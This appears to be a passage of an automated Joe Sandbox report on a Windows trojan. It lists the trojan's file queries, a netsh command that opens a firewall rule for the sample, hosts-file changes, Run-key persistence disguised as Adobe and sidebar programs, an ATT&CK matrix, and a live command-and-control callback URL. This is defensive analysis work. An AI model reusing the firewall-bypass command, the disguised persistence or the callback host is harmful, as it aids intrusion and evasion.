Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Modifies the windows firewall

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Registry Run Keys / Startup Folder21	Process Injection12	Masquerading31	OS Credential Dumping	Security Software Discovery21	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Standard Port11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter12	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder21	File and Directory Permissions Modification1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools3	Security Account Manager	Virtualization/Sandbox Evasion41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Modify Registry1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion41	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection12	Cached Domain Credentials	System Information Discovery122	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	21%	Virustotal		Browse
5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	40%	ReversingLabs	Win64.Trojan.Fsysna

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.112.83.96:20000/callback	2%	Virustotal		Browse
http://185.112.83.96:20000/callback	100%	Avira URL Cloud	malware
http://185.112.83.96:20000/callbackmheap.freeSpanLocked	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.112.83.96:20000/callback	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.112.83.96:20000/callbackmheap.freeSpanLocked	acrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.112.83.96	unknown	Russian Federation		50113	SUPERSERVERSDATACENTERRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553368
Start date:	14.01.2022
Start time:	19:10:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 7s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	130
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.evad.winEXE@232/30@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 95.7% (good quality ratio 91.5%) Quality average: 63.4% Quality standard deviation: 36.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net Execution Graph export aborted for target 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, PID 4356 because there are no executed function Execution Graph export aborted for target acrotray.exe, PID 5268 because there are no executed function Execution Graph export aborted for target acrotray.exe, PID 7120 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:11:34	API Interceptor	225x Sleep call for process: powershell.exe modified
19:11:37	API Interceptor	9x Sleep call for process: WMIC.exe modified
19:11:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run acrotray C:\Windows\acrotray.exe
19:11:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run acrotray C:\Windows\acrotray.exe
19:11:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sidebar C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
19:12:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
19:12:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sidebar C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
19:12:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fx1ezon.lgh.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pie02pg.wgf.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uqrqs4k.34i.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab5jticm.dks.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amblrihn.2wj.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
